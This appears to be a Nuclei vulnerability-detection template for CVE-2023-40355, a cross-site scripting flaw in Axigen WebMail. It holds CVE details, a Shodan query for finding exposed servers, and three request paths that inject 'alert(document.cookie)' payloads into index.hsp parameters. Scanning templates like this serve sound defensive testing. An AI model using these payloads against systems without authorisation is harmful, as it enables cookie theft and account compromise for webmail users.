id: CVE-2023-40355

info:
  name: Axigen WebMail - Cross-Site Scripting
  author: amir-h-fallahi
  severity: medium
  description: |
    Cross Site Scripting (XSS) vulnerability in Axigen versions 10.3.3.0 before 10.3.3.59, 10.4.0 before 10.4.19, and 10.5.0 before 10.5.5, allows authenticated attackers to execute arbitrary code and obtain sensitive information via the logic for switching between the Standard and Ajax versions.
  reference:
    - https://www.axigen.com/knowledgebase/Axigen-WebMail-XSS-Vulnerability-CVE-2023-40355-_396.html
    - https://nvd.nist.gov/vuln/detail/CVE-2023-40355
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N
    cvss-score: 6.5
    cve-id: CVE-2023-40355
    cwe-id: CWE-79
    epss-score: 0.0006
    epss-percentile: 0.22931
  metadata:
    max-request: 3
    verified: true
    shodan-query: http.favicon.hash:-1247684400
  tags: cve,cve2023,xss,axigen,webmail

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.hsp?passwordExpired=yes&username=\\'-alert(document.cookie),//"
      - "{{BaseURL}}/index.hsp?passwordExpired=yes&domainName=\\'-alert(document.cookie),//"
      - "{{BaseURL}}/index.hsp?m=',alert(document.cookie),'"

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "\\\\'-alert(document.cookie),//"
          - "',alert(document.cookie),'"
        condition: or

      - type: dsl
        dsl:
          - 'contains(header, "text/html")'
          - 'contains(response, "Axigen")'
          - 'status_code == 200'
        condition: and